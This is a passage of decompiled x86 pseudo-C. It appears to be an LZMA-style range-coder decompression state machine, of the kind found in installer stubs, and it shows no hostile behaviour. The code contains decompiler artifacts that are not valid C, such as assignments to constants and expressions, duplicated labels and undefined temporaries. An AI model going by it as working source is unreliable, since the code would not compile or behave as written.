                                                                                                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        														__eflags = __eax;
                                                                                                                        													}
                                                                                                                        													__ecx =  *(__ebp - 8);
                                                                                                                        													__ebx = 0;
                                                                                                                        													__ebx = 1;
                                                                                                                        													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        													goto L41;
                                                                                                                        												}
                                                                                                                        											case 7:
                                                                                                                        												goto L0;
                                                                                                                        											case 8:
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													__eax =  *(__ebp - 4);
                                                                                                                        													__ecx =  *(__ebp - 0x38);
                                                                                                                        													 *(__ebp - 0x84) = 0xa;
                                                                                                                        													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                        												} else {
                                                                                                                        													__eax =  *(__ebp - 0x38);
                                                                                                                        													__ecx =  *(__ebp - 4);
                                                                                                                        													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                        													 *(__ebp - 0x84) = 9;
                                                                                                                        													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                        													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                        												}
                                                                                                                        												while(1) {
                                                                                                                        													L132:
                                                                                                                        													 *(_t621 - 0x54) = _t614;
                                                                                                                        													goto L133;
                                                                                                                        												}
                                                                                                                        											case 9:
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													goto L89;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x60);
                                                                                                                        												if( *(__ebp - 0x60) == 0) {
                                                                                                                        													goto L171;
                                                                                                                        												}
                                                                                                                        												__eax = 0;
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                        												__eflags = _t258;
                                                                                                                        												0 | _t258 = _t258 + _t258 + 9;
                                                                                                                        												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                        												goto L75;
                                                                                                                        											case 0xa:
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													__eax =  *(__ebp - 4);
                                                                                                                        													__ecx =  *(__ebp - 0x38);
                                                                                                                        													 *(__ebp - 0x84) = 0xb;
                                                                                                                        													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                        													while(1) {
                                                                                                                        														L132:
                                                                                                                        														 *(_t621 - 0x54) = _t614;
                                                                                                                        														goto L133;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x28);
                                                                                                                        												goto L88;
                                                                                                                        											case 0xb:
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													__ecx =  *(__ebp - 0x24);
                                                                                                                        													__eax =  *(__ebp - 0x20);
                                                                                                                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        												} else {
                                                                                                                        													__eax =  *(__ebp - 0x24);
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x28);
                                                                                                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        												L88:
                                                                                                                        												__ecx =  *(__ebp - 0x2c);
                                                                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                                                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        												L89:
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												 *(__ebp - 0x80) = 0x15;
                                                                                                                        												__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                        												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                        												goto L68;
                                                                                                                        											case 0xc:
                                                                                                                        												L99:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0xc;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t334 = __ebp - 0x70;
                                                                                                                        												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t334;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												__eax =  *(__ebp - 0x2c);
                                                                                                                        												goto L101;
                                                                                                                        											case 0xd:
                                                                                                                        												L37:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0xd;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t122 = __ebp - 0x70;
                                                                                                                        												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t122;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												L39:
                                                                                                                        												__eax =  *(__ebp - 0x40);
                                                                                                                        												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                        													goto L48;
                                                                                                                        												}
                                                                                                                        												__eflags = __ebx - 0x100;
                                                                                                                        												if(__ebx >= 0x100) {
                                                                                                                        													goto L54;
                                                                                                                        												}
                                                                                                                        												L41:
                                                                                                                        												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                        												__ecx =  *(__ebp - 0x58);
                                                                                                                        												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                        												 *(__ebp - 0x48) = __eax;
                                                                                                                        												__eax = __eax + 1;
                                                                                                                        												__eax = __eax << 8;
                                                                                                                        												__eax = __eax + __ebx;
                                                                                                                        												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        												__ax =  *__esi;
                                                                                                                        												 *(__ebp - 0x54) = __esi;
                                                                                                                        												__edx = __ax & 0x0000ffff;
                                                                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        													__cx = __ax;
                                                                                                                        													 *(__ebp - 0x40) = 1;
                                                                                                                        													__cx = __ax >> 5;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													__ebx = __ebx + __ebx + 1;
                                                                                                                        													 *__esi = __ax;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                                                                        													0x800 = 0x800 - __edx;
                                                                                                                        													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                        													__ebx = __ebx + __ebx;
                                                                                                                        													 *__esi = __cx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													goto L39;
                                                                                                                        												} else {
                                                                                                                        													goto L37;
                                                                                                                        												}
                                                                                                                        											case 0xe:
                                                                                                                        												L46:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0xe;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t156 = __ebp - 0x70;
                                                                                                                        												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t156;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												while(1) {
                                                                                                                        													L48:
                                                                                                                        													__eflags = __ebx - 0x100;
                                                                                                                        													if(__ebx >= 0x100) {
                                                                                                                        														break;
                                                                                                                        													}
                                                                                                                        													__eax =  *(__ebp - 0x58);
                                                                                                                        													__edx = __ebx + __ebx;
                                                                                                                        													__ecx =  *(__ebp - 0x10);
                                                                                                                        													__esi = __edx + __eax;
                                                                                                                        													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        													__ax =  *__esi;
                                                                                                                        													 *(__ebp - 0x54) = __esi;
                                                                                                                        													__edi = __ax & 0x0000ffff;
                                                                                                                        													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        														__cx = __ax;
                                                                                                                        														_t170 = __edx + 1; // 0x1
                                                                                                                        														__ebx = _t170;
                                                                                                                        														__cx = __ax >> 5;
                                                                                                                        														__eflags = __eax;
                                                                                                                        														 *__esi = __ax;
                                                                                                                        													} else {
                                                                                                                        														 *(__ebp - 0x10) = __ecx;
                                                                                                                        														0x800 = 0x800 - __edi;
                                                                                                                        														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        														__ebx = __ebx + __ebx;
                                                                                                                        														 *__esi = __cx;
                                                                                                                        													}
                                                                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        														continue;
                                                                                                                        													} else {
                                                                                                                        														goto L46;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												L54:
                                                                                                                        												_t173 = __ebp - 0x34;
                                                                                                                        												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                        												__eflags =  *_t173;
                                                                                                                        												goto L55;
                                                                                                                        											case 0xf:
                                                                                                                        												L58:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0xf;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t203 = __ebp - 0x70;
                                                                                                                        												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t203;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												L60:
                                                                                                                        												__eflags = __ebx - 0x100;
                                                                                                                        												if(__ebx >= 0x100) {
                                                                                                                        													L55:
                                                                                                                        													__al =  *(__ebp - 0x44);
                                                                                                                        													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                        													goto L56;
                                                                                                                        												}
                                                                                                                        												L61:
                                                                                                                        												__eax =  *(__ebp - 0x58);
                                                                                                                        												__edx = __ebx + __ebx;
                                                                                                                        												__ecx =  *(__ebp - 0x10);
                                                                                                                        												__esi = __edx + __eax;
                                                                                                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        												__ax =  *__esi;
                                                                                                                        												 *(__ebp - 0x54) = __esi;
                                                                                                                        												__edi = __ax & 0x0000ffff;
                                                                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        													__cx = __ax;
                                                                                                                        													_t217 = __edx + 1; // 0x1
                                                                                                                        													__ebx = _t217;
                                                                                                                        													__cx = __ax >> 5;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													 *__esi = __ax;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                                                                        													0x800 = 0x800 - __edi;
                                                                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        													__ebx = __ebx + __ebx;
                                                                                                                        													 *__esi = __cx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													goto L60;
                                                                                                                        												} else {
                                                                                                                        													goto L58;
                                                                                                                        												}
                                                                                                                        											case 0x10:
                                                                                                                        												L109:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0x10;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t365 = __ebp - 0x70;
                                                                                                                        												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t365;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												goto L111;
                                                                                                                        											case 0x11:
                                                                                                                        												L68:
                                                                                                                        												_t614 =  *(_t621 - 0x58);
                                                                                                                        												 *(_t621 - 0x84) = 0x12;
                                                                                                                        												while(1) {
                                                                                                                        													L132:
                                                                                                                        													 *(_t621 - 0x54) = _t614;
                                                                                                                        													goto L133;
                                                                                                                        												}
                                                                                                                        											case 0x12:
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													__eax =  *(__ebp - 0x58);
                                                                                                                        													 *(__ebp - 0x84) = 0x13;
                                                                                                                        													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                        													while(1) {
                                                                                                                        														L132:
                                                                                                                        														 *(_t621 - 0x54) = _t614;
                                                                                                                        														goto L133;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x4c);
                                                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                        												__ecx =  *(__ebp - 0x58);
                                                                                                                        												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        												__eflags = __eax;
                                                                                                                        												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                        												goto L130;
                                                                                                                        											case 0x13:
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													_t469 = __ebp - 0x58;
                                                                                                                        													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                        													__eflags =  *_t469;
                                                                                                                        													 *(__ebp - 0x30) = 0x10;
                                                                                                                        													 *(__ebp - 0x40) = 8;
                                                                                                                        													L144:
                                                                                                                        													 *(__ebp - 0x7c) = 0x14;
                                                                                                                        													goto L145;
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x4c);
                                                                                                                        												__ecx =  *(__ebp - 0x58);
                                                                                                                        												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        												 *(__ebp - 0x30) = 8;
                                                                                                                        												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                        												L130:
                                                                                                                        												 *(__ebp - 0x58) = __eax;
                                                                                                                        												 *(__ebp - 0x40) = 3;
                                                                                                                        												goto L144;
                                                                                                                        											case 0x14:
                                                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                        												__eax =  *(__ebp - 0x80);
                                                                                                                        												 *(_t621 - 0x88) = _t542;
                                                                                                                        												goto L1;
                                                                                                                        											case 0x15:
                                                                                                                        												__eax = 0;
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        												__al = __al & 0x000000fd;
                                                                                                                        												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        												goto L120;
                                                                                                                        											case 0x16:
                                                                                                                        												__eax =  *(__ebp - 0x30);
                                                                                                                        												__eflags = __eax - 4;
                                                                                                                        												if(__eax >= 4) {
                                                                                                                        													_push(3);
                                                                                                                        													_pop(__eax);
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                        												 *(__ebp - 0x40) = 6;
                                                                                                                        												__eax = __eax << 7;
                                                                                                                        												 *(__ebp - 0x7c) = 0x19;
                                                                                                                        												 *(__ebp - 0x58) = __eax;
                                                                                                                        												goto L145;
                                                                                                                        											case 0x17:
                                                                                                                        												L145:
                                                                                                                        												__eax =  *(__ebp - 0x40);
                                                                                                                        												 *(__ebp - 0x50) = 1;
                                                                                                                        												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                        												goto L149;
                                                                                                                        											case 0x18:
                                                                                                                        												L146:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0x18;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t484 = __ebp - 0x70;
                                                                                                                        												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t484;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												L148:
                                                                                                                        												_t487 = __ebp - 0x48;
                                                                                                                        												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                        												__eflags =  *_t487;
                                                                                                                        												L149:
                                                                                                                        												__eflags =  *(__ebp - 0x48);
                                                                                                                        												if( *(__ebp - 0x48) <= 0) {
                                                                                                                        													__ecx =  *(__ebp - 0x40);
                                                                                                                        													__ebx =  *(__ebp - 0x50);
                                                                                                                        													0 = 1;
                                                                                                                        													__eax = 1 << __cl;
                                                                                                                        													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                        													__eax =  *(__ebp - 0x7c);
                                                                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                                                                        													while(1) {
                                                                                                                        														 *(_t621 - 0x88) = _t542;
                                                                                                                        														goto L1;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x50);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        												__eax =  *(__ebp - 0x58);
                                                                                                                        												__esi = __edx + __eax;
                                                                                                                        												 *(__ebp - 0x54) = __esi;
                                                                                                                        												__ax =  *__esi;
                                                                                                                        												__edi = __ax & 0x0000ffff;
                                                                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        													__cx = __ax;
                                                                                                                        													__cx = __ax >> 5;
                                                                                                                        													__eax = __eax - __ecx;
                                                                                                                        													__edx = __edx + 1;
                                                                                                                        													__eflags = __edx;
                                                                                                                        													 *__esi = __ax;
                                                                                                                        													 *(__ebp - 0x50) = __edx;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                                                                        													0x800 = 0x800 - __edi;
                                                                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        													 *__esi = __cx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													goto L148;
                                                                                                                        												} else {
                                                                                                                        													goto L146;
                                                                                                                        												}
                                                                                                                        											case 0x19:
                                                                                                                        												__eflags = __ebx - 4;
                                                                                                                        												if(__ebx < 4) {
                                                                                                                        													 *(__ebp - 0x2c) = __ebx;
                                                                                                                        													L119:
                                                                                                                        													_t393 = __ebp - 0x2c;
                                                                                                                        													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                        													__eflags =  *_t393;
                                                                                                                        													L120:
                                                                                                                        													__eax =  *(__ebp - 0x2c);
                                                                                                                        													__eflags = __eax;
                                                                                                                        													if(__eax == 0) {
                                                                                                                        														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                        														goto L170;
                                                                                                                        													}
                                                                                                                        													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                        													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                        														goto L171;
                                                                                                                        													}
                                                                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                        													__eax =  *(__ebp - 0x30);
                                                                                                                        													_t400 = __ebp - 0x60;
                                                                                                                        													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                        													__eflags =  *_t400;
                                                                                                                        													goto L123;
                                                                                                                        												}
                                                                                                                        												__ecx = __ebx;
                                                                                                                        												__eax = __ebx;
                                                                                                                        												__ecx = __ebx >> 1;
                                                                                                                        												__eax = __ebx & 0x00000001;
                                                                                                                        												__ecx = (__ebx >> 1) - 1;
                                                                                                                        												__al = __al | 0x00000002;
                                                                                                                        												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                        												__eflags = __ebx - 0xe;
                                                                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                                                                        												if(__ebx >= 0xe) {
                                                                                                                        													__ebx = 0;
                                                                                                                        													 *(__ebp - 0x48) = __ecx;
                                                                                                                        													L102:
                                                                                                                        													__eflags =  *(__ebp - 0x48);
                                                                                                                        													if( *(__ebp - 0x48) <= 0) {
                                                                                                                        														__eax = __eax + __ebx;
                                                                                                                        														 *(__ebp - 0x40) = 4;
                                                                                                                        														 *(__ebp - 0x2c) = __eax;
                                                                                                                        														__eax =  *(__ebp - 4);
                                                                                                                        														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                        														__eflags = __eax;
                                                                                                                        														L108:
                                                                                                                        														__ebx = 0;
                                                                                                                        														 *(__ebp - 0x58) = __eax;
                                                                                                                        														 *(__ebp - 0x50) = 1;
                                                                                                                        														 *(__ebp - 0x44) = 0;
                                                                                                                        														 *(__ebp - 0x48) = 0;
                                                                                                                        														L112:
                                                                                                                        														__eax =  *(__ebp - 0x40);
                                                                                                                        														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                        															_t391 = __ebp - 0x2c;
                                                                                                                        															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                        															__eflags =  *_t391;
                                                                                                                        															goto L119;
                                                                                                                        														}
                                                                                                                        														__eax =  *(__ebp - 0x50);
                                                                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        														__eax =  *(__ebp - 0x58);
                                                                                                                        														__esi = __edi + __eax;
                                                                                                                        														 *(__ebp - 0x54) = __esi;
                                                                                                                        														__ax =  *__esi;
                                                                                                                        														__ecx = __ax & 0x0000ffff;
                                                                                                                        														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                        														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                        														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                        															__ecx = 0;
                                                                                                                        															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                        															__ecx = 1;
                                                                                                                        															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                        															__ebx = 1;
                                                                                                                        															__ecx =  *(__ebp - 0x48);
                                                                                                                        															__ebx = 1 << __cl;
                                                                                                                        															__ecx = 1 << __cl;
                                                                                                                        															__ebx =  *(__ebp - 0x44);
                                                                                                                        															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                        															__cx = __ax;
                                                                                                                        															__cx = __ax >> 5;
                                                                                                                        															__eax = __eax - __ecx;
                                                                                                                        															__edi = __edi + 1;
                                                                                                                        															__eflags = __edi;
                                                                                                                        															 *(__ebp - 0x44) = __ebx;
                                                                                                                        															 *__esi = __ax;
                                                                                                                        															 *(__ebp - 0x50) = __edi;
                                                                                                                        														} else {
                                                                                                                        															 *(__ebp - 0x10) = __edx;
                                                                                                                        															0x800 = 0x800 - __ecx;
                                                                                                                        															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                        															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        															 *__esi = __dx;
                                                                                                                        														}
                                                                                                                        														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        															L111:
                                                                                                                        															_t368 = __ebp - 0x48;
                                                                                                                        															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                        															__eflags =  *_t368;
                                                                                                                        															goto L112;
                                                                                                                        														} else {
                                                                                                                        															goto L109;
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                                                        													__ebx = __ebx + __ebx;
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
